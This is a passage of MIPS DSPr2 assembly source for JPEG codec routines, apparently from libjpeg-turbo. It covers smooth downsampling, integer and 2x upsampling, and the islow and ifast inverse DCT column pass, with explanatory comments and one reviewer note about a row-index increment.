    addu      s5, s5, t8        /* end address */
5:
    /* unrolled: four middle columns per iteration */
    lh        v0, 0(s2)
    lh        v1, 0(t9)
    lh        t0, 0(s0)
    lh        t1, 0(s1)
    ins       v0, v1, 16, 16
    ins       t0, t1, 16, 16
    raddu.w.qb t2, v0
    raddu.w.qb s3, t0
    lbu       v0, -1(s2)
    lbu       v1, 2(s2)
    lbu       t0, -1(t9)
    lbu       t1, 2(t9)
    addu      v0, v0, v1
    mult      $ac1, t2, t6
    addu      t0, t0, t1
    lbu       t2, 2(s0)
    addu      t0, t0, v0
    lbu       t3, 2(s1)
    addu      s3, t0, s3
    lbu       v0, -1(s0)
    lbu       t0, -1(s1)
    sll       s3, s3, 1
    addu      v0, v0, t2
    addu      t0, t0, t3
    lh        v1, 2(t9)
    addu      t0, t0, v0
    lh        v0, 2(s2)
    addu      s3, t0, s3
    lh        t0, 2(s0)
    lh        t1, 2(s1)
    madd      $ac1, s3, t7
    extr_r.w  t2, $ac1, 16      /* column 0 of the group */
    ins       t0, t1, 16, 16
    ins       v0, v1, 16, 16
    raddu.w.qb s3, t0
    lbu       v1, 4(s2)
    lbu       t0, 1(t9)
    lbu       t1, 4(t9)
    sb        t2, 0(t8)
    raddu.w.qb t3, v0
    lbu       v0, 1(s2)
    addu      t0, t0, t1
    mult      $ac1, t3, t6
    addu      v0, v0, v1
    lbu       t2, 4(s0)
    addu      t0, t0, v0
    lbu       v0, 1(s0)
    addu      s3, t0, s3
    lbu       t0, 1(s1)
    lbu       t3, 4(s1)
    addu      v0, v0, t2
    sll       s3, s3, 1
    addu      t0, t0, t3
    lh        v1, 4(t9)
    addu      t0, t0, v0
    lh        v0, 4(s2)
    addu      s3, t0, s3
    lh        t0, 4(s0)
    lh        t1, 4(s1)
    madd      $ac1, s3, t7
    extr_r.w  t2, $ac1, 16      /* column 1 of the group */
    ins       t0, t1, 16, 16
    ins       v0, v1, 16, 16
    raddu.w.qb s3, t0
    lbu       v1, 6(s2)
    lbu       t0, 3(t9)
    lbu       t1, 6(t9)
    sb        t2, 1(t8)
    raddu.w.qb t3, v0
    lbu       v0, 3(s2)
    addu      t0, t0, t1
    mult      $ac1, t3, t6
    addu      v0, v0, v1
    lbu       t2, 6(s0)
    addu      t0, t0, v0
    lbu       v0, 3(s0)
    addu      s3, t0, s3
    lbu       t0, 3(s1)
    lbu       t3, 6(s1)
    addu      v0, v0, t2
    sll       s3, s3, 1
    addu      t0, t0, t3
    lh        v1, 6(t9)
    addu      t0, t0, v0
    lh        v0, 6(s2)
    addu      s3, t0, s3
    lh        t0, 6(s0)
    lh        t1, 6(s1)
    madd      $ac1, s3, t7
    extr_r.w  t3, $ac1, 16      /* column 2 of the group */
    ins       t0, t1, 16, 16
    ins       v0, v1, 16, 16
    raddu.w.qb s3, t0
    lbu       v1, 8(s2)
    lbu       t0, 5(t9)
    lbu       t1, 8(t9)
    sb        t3, 2(t8)
    raddu.w.qb t2, v0
    lbu       v0, 5(s2)
    addu      t0, t0, t1
    mult      $ac1, t2, t6
    addu      v0, v0, v1
    lbu       t2, 8(s0)
    addu      t0, t0, v0
    lbu       v0, 5(s0)
    addu      s3, t0, s3
    lbu       t0, 5(s1)
    lbu       t3, 8(s1)
    addu      v0, v0, t2
    sll       s3, s3, 1
    addu      t0, t0, t3
    addiu     t8, t8, 4
    addu      t0, t0, v0
    addiu     s2, s2, 8
    addu      s3, t0, s3
    addiu     t9, t9, 8
    madd      $ac1, s3, t7
    extr_r.w  t1, $ac1, 16      /* column 3 of the group */
    addiu     s0, s0, 8
    addiu     s1, s1, 8
    bne       s5, t8, 5b
    sb        t1, -1(t8)        /* delay slot */
    /* Special case for last column */
    lh        v0, 0(s2)
    lh        v1, 0(t9)
    lh        t0, 0(s0)
    lh        t1, 0(s1)
    ins       v0, v1, 16, 16
    ins       t0, t1, 16, 16
    raddu.w.qb t2, v0
    raddu.w.qb s3, t0
    lbu       v0, -1(s2)
    lbu       v1, 1(s2)         /* right neighbor == last column itself */
    lbu       t0, -1(t9)
    lbu       t1, 1(t9)
    addu      v0, v0, v1
    mult      $ac1, t2, t6
    addu      t0, t0, t1
    lbu       t2, 1(s0)
    addu      t0, t0, v0
    lbu       t3, 1(s1)
    addu      s3, t0, s3
    lbu       v0, -1(s0)
    lbu       t0, -1(s1)
    sll       s3, s3, 1
    addu      v0, v0, t2
    addu      t0, t0, t3
    addu      t0, t0, v0
    addu      s3, t0, s3
    madd      $ac1, s3, t7
    extr_r.w  t0, $ac1, 16
    addiu     t5, t5, 2
    sb        t0, 0(t8)
    addiu     t4, t4, 1
    bne       t4, a2, 3b
    addiu     t5, t5, 2         /* delay slot */
    /* NOTE(review): t5 (inrow index) advances by 2 twice per output row,
     * i.e. by 4 row pointers per pass -- verify against the reference C
     * (h2v2 consumes 2 input rows per output row) and upstream history. */
    RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
    j         ra
    nop
END(jsimd_h2v2_smooth_downsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_int_upsample_dspr2)
/*
 * Integer-factor upsampling: replicate each input pixel h_expand times
 * horizontally, then duplicate each completed output row v_expand - 1
 * additional times, until max_v_samp_factor output rows are produced.
 *
 * a0 = upsample->h_expand[compptr->component_index]
 * a1 = upsample->v_expand[compptr->component_index]
 * a2 = input_data
 * a3 = output_data_ptr
 * 16(sp) = cinfo->output_width
 * 20(sp) = cinfo->max_v_samp_factor
 */
.set at
SAVE_REGS_ON_STACK 16, s0, s1, s2, s3
lw s0, 0(a3) /* s0 = output_data */
lw s1, 32(sp) /* s1 = cinfo->output_width (16(sp) + 16-byte reg save) */
lw s2, 36(sp) /* s2 = cinfo->max_v_samp_factor */
li t6, 0 /* t6 = inrow */
beqz s2, 10f /* no output rows requested */
li s3, 0 /* s3 = outrow (delay slot) */
0:
/* Per-row setup: fetch the current input and output row pointers. */
addu t0, a2, t6
addu t7, s0, s3
lw t3, 0(t0) /* t3 = inptr */
lw t8, 0(t7) /* t8 = outptr */
beqz s1, 4f /* zero-width row: skip pixel loop */
addu t5, t8, s1 /* t5 = outend (delay slot) */
1:
lb t2, 0(t3) /* t2 = invalue = *inptr++ */
addiu t3, 1
beqz a0, 3f
move t0, a0 /* t0 = h_expand (delay slot) */
2:
/* Store invalue h_expand times. */
sb t2, 0(t8)
addiu t0, -1
bgtz t0, 2b
addiu t8, 1 /* outptr++ (delay slot) */
3:
bgt t5, t8, 1b /* until the output row is full */
nop
4:
/* Vertical expansion: copy the row just built v_expand - 1 times. */
addiu t9, a1, -1 /* t9 = v_expand - 1 */
blez t9, 9f
nop
5:
lw t3, 0(s0) /* t3 = source row pointer */
lw t4, 4(s0) /* t4 = destination row pointer */
subu t0, s1, 0xF
blez t0, 7f /* row narrower than 16 bytes: bytewise copy only */
addu t5, t3, s1 /* t5 = end address (delay slot) */
andi t7, s1, 0xF /* t7 = residual */
subu t8, t5, t7
6:
/* Copy 16 bytes per iteration; ulw/usw tolerate unaligned rows. */
ulw t0, 0(t3)
ulw t1, 4(t3)
ulw t2, 8(t3)
usw t0, 0(t4)
ulw t0, 12(t3)
usw t1, 4(t4)
usw t2, 8(t4)
usw t0, 12(t4)
addiu t3, 16
bne t3, t8, 6b
addiu t4, 16 /* delay slot */
beqz t7, 8f
nop
7:
/* Copy the residual tail one byte at a time. */
lbu t0, 0(t3)
sb t0, 0(t4)
addiu t3, 1
bne t3, t5, 7b
addiu t4, 1 /* delay slot */
8:
addiu t9, -1
bgtz t9, 5b
addiu s0, 8 /* s0 += 8: skip past the two row pointers (delay slot) */
9:
addu s3, s3, a1 /* outrow += v_expand */
bne s3, s2, 0b
addiu t6, 1 /* inrow++ (delay slot) */
10:
RESTORE_REGS_FROM_STACK 16, s0, s1, s2, s3
j ra
nop
END(jsimd_int_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v1_upsample_dspr2)
/*
 * 2x horizontal, 1x vertical upsampling: every input pixel becomes two
 * identical adjacent output pixels.  The main loop doubles 8 input
 * pixels into 16 output bytes per iteration with DSP insert/shift ops;
 * a residual loop handles widths that are not multiples of 16.
 *
 * a0 = cinfo->max_v_samp_factor
 * a1 = cinfo->output_width
 * a2 = input_data
 * a3 = output_data_ptr
 */
lw t7, 0(a3) /* t7 = output_data */
andi t8, a1, 0xf /* t8 = residual */
sll t0, a0, 2 /* t0 = max_v_samp_factor * 4 (row-pointer stride) */
blez a0, 4f
addu t9, t7, t0 /* t9 = output_data end address (delay slot) */
0:
lw t5, 0(t7) /* t5 = outptr */
lw t6, 0(a2) /* t6 = inptr */
addu t3, t5, a1 /* t3 = outptr + output_width (end address) */
subu t3, t8 /* t3 = end address - residual */
beq t5, t3, 2f /* width < 16: residual loop only */
move t4, t8 /* delay slot */
1:
/* Duplicate 8 pixels: build |Pn|Pn|Pm|Pm| words, then store 16 bytes. */
ulw t0, 0(t6) /* t0 = |P3|P2|P1|P0| */
ulw t2, 4(t6) /* t2 = |P7|P6|P5|P4| */
srl t1, t0, 16 /* t1 = |X|X|P3|P2| */
ins t0, t0, 16, 16 /* t0 = |P1|P0|P1|P0| */
ins t1, t1, 16, 16 /* t1 = |P3|P2|P3|P2| */
ins t0, t0, 8, 16 /* t0 = |P1|P1|P0|P0| */
ins t1, t1, 8, 16 /* t1 = |P3|P3|P2|P2| */
usw t0, 0(t5)
usw t1, 4(t5)
srl t0, t2, 16 /* t0 = |X|X|P7|P6| */
ins t2, t2, 16, 16 /* t2 = |P5|P4|P5|P4| */
ins t0, t0, 16, 16 /* t0 = |P7|P6|P7|P6| */
ins t2, t2, 8, 16 /* t2 = |P5|P5|P4|P4| */
ins t0, t0, 8, 16 /* t0 = |P7|P7|P6|P6| */
usw t2, 8(t5)
usw t0, 12(t5)
addiu t5, 16
bne t5, t3, 1b
addiu t6, 8 /* delay slot */
beqz t8, 3f /* no residual pixels */
move t4, t8 /* delay slot */
2:
/* Residual: each input byte written twice (2 output bytes). */
lbu t1, 0(t6)
sb t1, 0(t5)
sb t1, 1(t5)
addiu t4, -2
addiu t6, 1
bgtz t4, 2b
addiu t5, 2 /* delay slot */
3:
addiu t7, 4 /* next output row pointer */
bne t9, t7, 0b
addiu a2, 4 /* next input row pointer (delay slot) */
4:
j ra
nop
END(jsimd_h2v1_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v2_upsample_dspr2)
/*
 * 2x horizontal and 2x vertical upsampling: each input pixel maps to a
 * 2x2 block of identical output pixels.  The first output row of each
 * pair is built by pixel doubling (same scheme as h2v1); the second is
 * then produced as a straight memory copy of the first.
 *
 * a0 = cinfo->max_v_samp_factor
 * a1 = cinfo->output_width
 * a2 = input_data
 * a3 = output_data_ptr
 */
lw t7, 0(a3)
blez a0, 7f
andi t9, a1, 0xf /* t9 = residual (delay slot) */
0:
lw t6, 0(a2) /* t6 = inptr */
lw t5, 0(t7) /* t5 = outptr */
addu t8, t5, a1 /* t8 = outptr end address */
subu t8, t9 /* t8 = end address - residual */
beq t5, t8, 2f /* width < 16: residual loop only */
move t4, t9 /* delay slot */
1:
/* Double 8 input pixels into 16 output bytes. */
ulw t0, 0(t6)
srl t1, t0, 16
ins t0, t0, 16, 16
ins t0, t0, 8, 16
ins t1, t1, 16, 16
ins t1, t1, 8, 16
ulw t2, 4(t6)
usw t0, 0(t5)
usw t1, 4(t5)
srl t3, t2, 16
ins t2, t2, 16, 16
ins t2, t2, 8, 16
ins t3, t3, 16, 16
ins t3, t3, 8, 16
usw t2, 8(t5)
usw t3, 12(t5)
addiu t5, 16
bne t5, t8, 1b
addiu t6, 8 /* delay slot */
beqz t9, 3f
move t4, t9 /* delay slot */
2:
/* Residual pixels: one input byte -> two output bytes. */
lbu t0, 0(t6)
sb t0, 0(t5)
sb t0, 1(t5)
addiu t4, -2
addiu t6, 1
bgtz t4, 2b
addiu t5, 2 /* delay slot */
3:
/* Vertical doubling: copy the finished row into the next row. */
lw t6, 0(t7) /* t6 = outptr[0] */
lw t5, 4(t7) /* t5 = outptr[1] */
addu t4, t6, a1 /* t4 = new end address */
beq a1, t9, 5f /* entire width is residual: bytewise copy */
subu t8, t4, t9 /* delay slot */
4:
/* 16-byte unaligned-safe block copy. */
ulw t0, 0(t6)
ulw t1, 4(t6)
ulw t2, 8(t6)
usw t0, 0(t5)
ulw t0, 12(t6)
usw t1, 4(t5)
usw t2, 8(t5)
usw t0, 12(t5)
addiu t6, 16
bne t6, t8, 4b
addiu t5, 16 /* delay slot */
beqz t9, 6f
nop
5:
lbu t0, 0(t6)
sb t0, 0(t5)
addiu t6, 1
bne t6, t4, 5b
addiu t5, 1 /* delay slot */
6:
addiu t7, 8 /* skip the two output rows just written */
addiu a0, -2 /* two output rows consumed per iteration */
bgtz a0, 0b
addiu a2, 4 /* next input row (delay slot) */
7:
j ra
nop
END(jsimd_h2v2_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_islow_dspr2)
/*
 * Accurate ("islow") 8x8 integer inverse DCT.
 * Pass 1 processes the 8 columns of the dequantized coefficient block
 * into a 256-byte int32 workspace on the stack; pass 2 processes the 8
 * workspace rows, descales, and writes range-limited sample bytes.
 * Both passes take a fast path when all AC terms of a column/row are 0.
 * FIX_* constants are the usual islow multipliers scaled by 2^13.
 *
 * a0 = coef_block
 * a1 = compptr->dcttable
 * a2 = output
 * a3 = range_limit
 */
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
addiu sp, sp, -256 /* 64-entry int32 workspace */
move v0, sp /* v0 = wsptr */
addiu v1, zero, 8 /* v1 = DCTSIZE = 8 (column counter) */
1:
/* Pass 1: one column per iteration.  Gather the 7 AC terms and test
 * them all at once for the DC-only shortcut. */
lh s4, 32(a0) /* s4 = inptr[16] */
lh s5, 64(a0) /* s5 = inptr[32] */
lh s6, 96(a0) /* s6 = inptr[48] */
lh t1, 112(a0) /* t1 = inptr[56] */
lh t7, 16(a0) /* t7 = inptr[8] */
lh t5, 80(a0) /* t5 = inptr[40] */
lh t3, 48(a0) /* t3 = inptr[24] */
or s4, s4, t1
or s4, s4, t3
or s4, s4, t5
or s4, s4, t7
or s4, s4, s5
or s4, s4, s6
bnez s4, 2f
addiu v1, v1, -1 /* column counter-- (delay slot) */
/* DC-only column: replicate the scaled DC into all 8 workspace rows. */
lh s5, 0(a1) /* quantptr[DCTSIZE*0] */
lh s6, 0(a0) /* inptr[DCTSIZE*0] */
mul s5, s5, s6 /* DEQUANTIZE(inptr[0], quantptr[0]) */
sll s5, s5, 2 /* << PASS1_BITS */
sw s5, 0(v0)
sw s5, 32(v0)
sw s5, 64(v0)
sw s5, 96(v0)
sw s5, 128(v0)
sw s5, 160(v0)
sw s5, 192(v0)
b 3f
sw s5, 224(v0) /* delay slot */
2:
/* Full column: odd part first (rows 1, 3, 5, 7). */
lh t0, 112(a1)
lh t2, 48(a1)
lh t4, 80(a1)
lh t6, 16(a1)
mul t0, t0, t1 /* DEQUANTIZE(inptr[DCTSIZE*7],
quantptr[DCTSIZE*7]) */
mul t1, t2, t3 /* DEQUANTIZE(inptr[DCTSIZE*3],
quantptr[DCTSIZE*3]) */
mul t2, t4, t5 /* DEQUANTIZE(inptr[DCTSIZE*5],
quantptr[DCTSIZE*5]) */
mul t3, t6, t7 /* DEQUANTIZE(inptr[DCTSIZE*1],
quantptr[DCTSIZE*1]) */
lh t4, 32(a1)
lh t5, 32(a0)
lh t6, 96(a1)
lh t7, 96(a0)
addu s0, t0, t1 /* z3 = tmp0 + tmp2 */
addu s1, t1, t2 /* z2 = tmp1 + tmp2 */
addu s2, t2, t3 /* z4 = tmp1 + tmp3 */
addu s3, s0, s2 /* z3 + z4 */
addiu t9, zero, 9633 /* FIX_1_175875602 */
mul s3, s3, t9 /* z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
addu t8, t0, t3 /* z1 = tmp0 + tmp3 */
addiu t9, zero, 2446 /* FIX_0_298631336 */
mul t0, t0, t9 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
addiu t9, zero, 16819 /* FIX_2_053119869 */
mul t2, t2, t9 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
addiu t9, zero, 25172 /* FIX_3_072711026 */
mul t1, t1, t9 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
addiu t9, zero, 12299 /* FIX_1_501321110 */
mul t3, t3, t9 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
addiu t9, zero, 16069 /* FIX_1_961570560 */
mul s0, s0, t9 /* -z3 = MULTIPLY(z3, FIX_1_961570560) */
addiu t9, zero, 3196 /* FIX_0_390180644 */
mul s2, s2, t9 /* -z4 = MULTIPLY(z4, FIX_0_390180644) */
addiu t9, zero, 7373 /* FIX_0_899976223 */
mul t8, t8, t9 /* -z1 = MULTIPLY(z1, FIX_0_899976223) */
addiu t9, zero, 20995 /* FIX_2_562915447 */
mul s1, s1, t9 /* -z2 = MULTIPLY(z2, FIX_2_562915447) */
subu s0, s3, s0 /* z3 += z5 */
addu t0, t0, s0 /* tmp0 += z3 */
addu t1, t1, s0 /* tmp2 += z3 */
subu s2, s3, s2 /* z4 += z5 */
addu t2, t2, s2 /* tmp1 += z4 */
addu t3, t3, s2 /* tmp3 += z4 */
subu t0, t0, t8 /* tmp0 += z1 */
subu t1, t1, s1 /* tmp2 += z2 */
subu t2, t2, s1 /* tmp1 += z2 */
subu t3, t3, t8 /* tmp3 += z1 */
/* Even part (rows 0, 2, 4, 6). */
mul s0, t4, t5 /* DEQUANTIZE(inptr[DCTSIZE*2],
quantptr[DCTSIZE*2]) */
addiu t9, zero, 6270 /* FIX_0_765366865 */
mul s1, t6, t7 /* DEQUANTIZE(inptr[DCTSIZE*6],
quantptr[DCTSIZE*6]) */
lh t4, 0(a1)
lh t5, 0(a0)
lh t6, 64(a1)
lh t7, 64(a0)
mul s2, t9, s0 /* MULTIPLY(z2, FIX_0_765366865) */
mul t5, t4, t5 /* DEQUANTIZE(inptr[DCTSIZE*0],
quantptr[DCTSIZE*0]) */
mul t6, t6, t7 /* DEQUANTIZE(inptr[DCTSIZE*4],
quantptr[DCTSIZE*4]) */
addiu t9, zero, 4433 /* FIX_0_541196100 */
addu s3, s0, s1 /* z2 + z3 */
mul s3, s3, t9 /* z1 = MULTIPLY(z2 + z3, FIX_0_541196100) */
addiu t9, zero, 15137 /* FIX_1_847759065 */
mul t8, s1, t9 /* MULTIPLY(z3, FIX_1_847759065) */
addu t4, t5, t6
subu t5, t5, t6
sll t4, t4, 13 /* tmp0 = (z2 + z3) << CONST_BITS */
sll t5, t5, 13 /* tmp1 = (z2 - z3) << CONST_BITS */
addu t7, s3, s2 /* tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865) */
subu t6, s3, t8 /* tmp2 =
z1 + MULTIPLY(z3, -FIX_1_847759065) */
/* Butterfly of even/odd parts, then descale by CONST_BITS-PASS1_BITS. */
addu s0, t4, t7
subu s1, t4, t7
addu s2, t5, t6
subu s3, t5, t6
addu t4, s0, t3
subu s0, s0, t3
addu t3, s2, t1
subu s2, s2, t1
addu t1, s3, t2
subu s3, s3, t2
addu t2, s1, t0
subu s1, s1, t0
shra_r.w t4, t4, 11 /* rounded >> (CONST_BITS - PASS1_BITS) */
shra_r.w t3, t3, 11
shra_r.w t1, t1, 11
shra_r.w t2, t2, 11
shra_r.w s1, s1, 11
shra_r.w s3, s3, 11
shra_r.w s2, s2, 11
shra_r.w s0, s0, 11
sw t4, 0(v0)
sw t3, 32(v0)
sw t1, 64(v0)
sw t2, 96(v0)
sw s1, 128(v0)
sw s3, 160(v0)
sw s2, 192(v0)
sw s0, 224(v0)
3:
/* Advance to the next column of coefficients / workspace. */
addiu a1, a1, 2
addiu a0, a0, 2
bgtz v1, 1b
addiu v0, v0, 4 /* delay slot */
move v0, sp /* rewind wsptr for pass 2 */
addiu v1, zero, 8 /* row counter */
4:
/* Pass 2: one workspace row per iteration, AC-all-zero test first. */
lw t0, 8(v0) /* z2 = (JLONG)wsptr[2] */
lw t1, 24(v0) /* z3 = (JLONG)wsptr[6] */
lw t2, 0(v0) /* (JLONG)wsptr[0] */
lw t3, 16(v0) /* (JLONG)wsptr[4] */
lw s4, 4(v0) /* (JLONG)wsptr[1] */
lw s5, 12(v0) /* (JLONG)wsptr[3] */
lw s6, 20(v0) /* (JLONG)wsptr[5] */
lw s7, 28(v0) /* (JLONG)wsptr[7] */
or s4, s4, t0
or s4, s4, t1
or s4, s4, t3
or s4, s4, s7
or s4, s4, s5
or s4, s4, s6
bnez s4, 5f
addiu v1, v1, -1 /* row counter-- (delay slot) */
/* DC-only row: descale, range-limit once, replicate byte 8 times. */
shra_r.w s5, t2, 5 /* rounded >> (PASS1_BITS + 3) */
andi s5, s5, 0x3ff /* mask into range_limit table index */
lbux s5, s5(a3) /* range-limited sample */
lw s1, 0(a2)
replv.qb s5, s5 /* replicate byte into all 4 lanes */
usw s5, 0(s1)
usw s5, 4(s1)
b 6f
nop
5:
/* Full row: even part. */
addu t4, t0, t1 /* z2 + z3 */
addiu t8, zero, 4433 /* FIX_0_541196100 */
mul t5, t4, t8 /* z1 = MULTIPLY(z2 + z3, FIX_0_541196100) */
addiu t8, zero, 15137 /* FIX_1_847759065 */
mul t1, t1, t8 /* MULTIPLY(z3, FIX_1_847759065) */
addiu t8, zero, 6270 /* FIX_0_765366865 */
mul t0, t0, t8 /* MULTIPLY(z2, FIX_0_765366865) */
addu t4, t2, t3 /* (JLONG)wsptr[0] + (JLONG)wsptr[4] */
subu t2, t2, t3 /* (JLONG)wsptr[0] - (JLONG)wsptr[4] */
sll t4, t4, 13 /* tmp0 =
(wsptr[0] + wsptr[4]) << CONST_BITS */
sll t2, t2, 13 /* tmp1 =
(wsptr[0] - wsptr[4]) << CONST_BITS */
subu t1, t5, t1 /* tmp2 =
z1 + MULTIPLY(z3, -FIX_1_847759065) */
subu t3, t2, t1 /* tmp12 = tmp1 - tmp2 */
addu t2, t2, t1 /* tmp11 = tmp1 + tmp2 */
addu t5, t5, t0 /* tmp3 =
z1 + MULTIPLY(z2, FIX_0_765366865) */
subu t1, t4, t5 /* tmp13 = tmp0 - tmp3 */
addu t0, t4, t5 /* tmp10 = tmp0 + tmp3 */
/* Odd part. */
lw t4, 28(v0) /* tmp0 = (JLONG)wsptr[7] */
lw t6, 12(v0) /* tmp2 = (JLONG)wsptr[3] */
lw t5, 20(v0) /* tmp1 = (JLONG)wsptr[5] */
lw t7, 4(v0) /* tmp3 = (JLONG)wsptr[1] */
addu s0, t4, t6 /* z3 = tmp0 + tmp2 */
addiu t8, zero, 9633 /* FIX_1_175875602 */
addu s1, t5, t7 /* z4 = tmp1 + tmp3 */
addu s2, s0, s1 /* z3 + z4 */
mul s2, s2, t8 /* z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
addu s3, t4, t7 /* z1 = tmp0 + tmp3 */
addu t9, t5, t6 /* z2 = tmp1 + tmp2 */
addiu t8, zero, 16069 /* FIX_1_961570560 */
mul s0, s0, t8 /* -z3 = MULTIPLY(z3, FIX_1_961570560) */
addiu t8, zero, 3196 /* FIX_0_390180644 */
mul s1, s1, t8 /* -z4 = MULTIPLY(z4, FIX_0_390180644) */
addiu t8, zero, 2446 /* FIX_0_298631336 */
mul t4, t4, t8 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
addiu t8, zero, 7373 /* FIX_0_899976223 */
mul s3, s3, t8 /* -z1 = MULTIPLY(z1, FIX_0_899976223) */
addiu t8, zero, 16819 /* FIX_2_053119869 */
mul t5, t5, t8 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
addiu t8, zero, 20995 /* FIX_2_562915447 */
mul t9, t9, t8 /* -z2 = MULTIPLY(z2, FIX_2_562915447) */
addiu t8, zero, 25172 /* FIX_3_072711026 */
mul t6, t6, t8 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
addiu t8, zero, 12299 /* FIX_1_501321110 */
mul t7, t7, t8 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
subu s0, s2, s0 /* z3 += z5 */
subu s1, s2, s1 /* z4 += z5 */
addu t4, t4, s0
subu t4, t4, s3 /* tmp0 */
addu t5, t5, s1
subu t5, t5, t9 /* tmp1 */
addu t6, t6, s0
subu t6, t6, t9 /* tmp2 */
addu t7, t7, s1
subu t7, t7, s3 /* tmp3 */
/* Final butterfly, descale, range-limit, emit 8 sample bytes. */
addu s0, t0, t7
subu t0, t0, t7
addu t7, t2, t6
subu t2, t2, t6
addu t6, t3, t5
subu t3, t3, t5
addu t5, t1, t4
subu t1, t1, t4
shra_r.w s0, s0, 18 /* rounded >> (CONST_BITS + PASS1_BITS + 3) */
shra_r.w t7, t7, 18
shra_r.w t6, t6, 18
shra_r.w t5, t5, 18
shra_r.w t1, t1, 18
shra_r.w t3, t3, 18
shra_r.w t2, t2, 18
shra_r.w t0, t0, 18
andi s0, s0, 0x3ff /* mask into range_limit table index */
andi t7, t7, 0x3ff
andi t6, t6, 0x3ff
andi t5, t5, 0x3ff
andi t1, t1, 0x3ff
andi t3, t3, 0x3ff
andi t2, t2, 0x3ff
andi t0, t0, 0x3ff
lw s1, 0(a2) /* s1 = output row pointer */
lbux s0, s0(a3) /* range_limit[...] */
lbux t7, t7(a3)
lbux t6, t6(a3)
lbux t5, t5(a3)
lbux t1, t1(a3)
lbux t3, t3(a3)
lbux t2, t2(a3)
lbux t0, t0(a3)
sb s0, 0(s1)
sb t7, 1(s1)
sb t6, 2(s1)
sb t5, 3(s1)
sb t1, 4(s1)
sb t3, 5(s1)
sb t2, 6(s1)
sb t0, 7(s1)
6:
addiu v0, v0, 32 /* next workspace row */
bgtz v1, 4b
addiu a2, a2, 4 /* next output row pointer (delay slot) */
addiu sp, sp, 256 /* release workspace */
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_idct_islow_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_ifast_cols_dspr2)
/*
 * Fast ("ifast") IDCT, column pass.  Each iteration processes two
 * columns at once by packing two 16-bit coefficients per register and
 * using paired-halfword DSP arithmetic (addq.ph/subq.ph/mulq_s.ph).
 * Dequantization uses muleq_s.w.phl/phr on packed quant factors.
 * Columns whose AC terms are all zero take a store-only shortcut.
 * AT holds the fixed-point coefficient table for the odd part.
 *
 * a0 = inptr
 * a1 = quantptr
 * a2 = wsptr
 * a3 = mips_idct_ifast_coefs
 */
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
addiu t9, a0, 16 /* end address */
or AT, a3, zero /* AT = coefficient table pointer */
0:
lw s0, 0(a1) /* quantptr[DCTSIZE*0] */
lw t0, 0(a0) /* inptr[DCTSIZE*0] */
lw t1, 16(a0) /* inptr[DCTSIZE*1] */
muleq_s.w.phl v0, t0, s0 /* tmp0 ... */
lw t2, 32(a0) /* inptr[DCTSIZE*2] */
lw t3, 48(a0) /* inptr[DCTSIZE*3] */
lw t4, 64(a0) /* inptr[DCTSIZE*4] */
lw t5, 80(a0) /* inptr[DCTSIZE*5] */
muleq_s.w.phr t0, t0, s0 /* ... tmp0 ... */
lw t6, 96(a0) /* inptr[DCTSIZE*6] */
lw t7, 112(a0) /* inptr[DCTSIZE*7] */
/* AC-all-zero test for both packed columns. */
or s4, t1, t2
or s5, t3, t4
bnez s4, 1f
ins t0, v0, 16, 16 /* ... tmp0 (delay slot) */
bnez s5, 1f
or s6, t5, t6 /* delay slot */
or s6, s6, t7
bnez s6, 1f
sw t0, 0(a2) /* wsptr[DCTSIZE*0] (delay slot) */
/* DC-only: replicate dequantized DC down both columns. */
sw t0, 16(a2) /* wsptr[DCTSIZE*1] */
sw t0, 32(a2) /* wsptr[DCTSIZE*2] */
sw t0, 48(a2) /* wsptr[DCTSIZE*3] */
sw t0, 64(a2) /* wsptr[DCTSIZE*4] */
sw t0, 80(a2) /* wsptr[DCTSIZE*5] */
sw t0, 96(a2) /* wsptr[DCTSIZE*6] */
sw t0, 112(a2) /* wsptr[DCTSIZE*7] */
addiu a0, a0, 4
b 2f
addiu a1, a1, 4 /* delay slot */
1:
/* Even part: dequantize rows 2, 4, 6 and combine with row 0. */
lw s1, 32(a1) /* quantptr[DCTSIZE*2] */
lw s2, 64(a1) /* quantptr[DCTSIZE*4] */
muleq_s.w.phl v0, t2, s1 /* tmp1 ... */
muleq_s.w.phr t2, t2, s1 /* ... tmp1 ... */
lw s0, 16(a1) /* quantptr[DCTSIZE*1] */
lw s1, 48(a1) /* quantptr[DCTSIZE*3] */
lw s3, 96(a1) /* quantptr[DCTSIZE*6] */
muleq_s.w.phl v1, t4, s2 /* tmp2 ... */
muleq_s.w.phr t4, t4, s2 /* ... tmp2 ... */
lw s2, 80(a1) /* quantptr[DCTSIZE*5] */
lw t8, 4(AT) /* FIX(1.414213562) */
ins t2, v0, 16, 16 /* ... tmp1 */
muleq_s.w.phl v0, t6, s3 /* tmp3 ... */
muleq_s.w.phr t6, t6, s3 /* ... tmp3 ... */
ins t4, v1, 16, 16 /* ... tmp2 */
addq.ph s4, t0, t4 /* tmp10 */
subq.ph s5, t0, t4 /* tmp11 */
ins t6, v0, 16, 16 /* ... tmp3 */
subq.ph s6, t2, t6 /* tmp12 ... */
addq.ph s7, t2, t6 /* tmp13 */
mulq_s.ph s6, s6, t8 /* ... tmp12 ... */
addq.ph t0, s4, s7 /* tmp0 */
subq.ph t6, s4, s7 /* tmp3 */
/* Odd part: dequantize rows 1, 3, 5, 7 while the even part settles. */
muleq_s.w.phl v0, t1, s0 /* tmp4 ... */
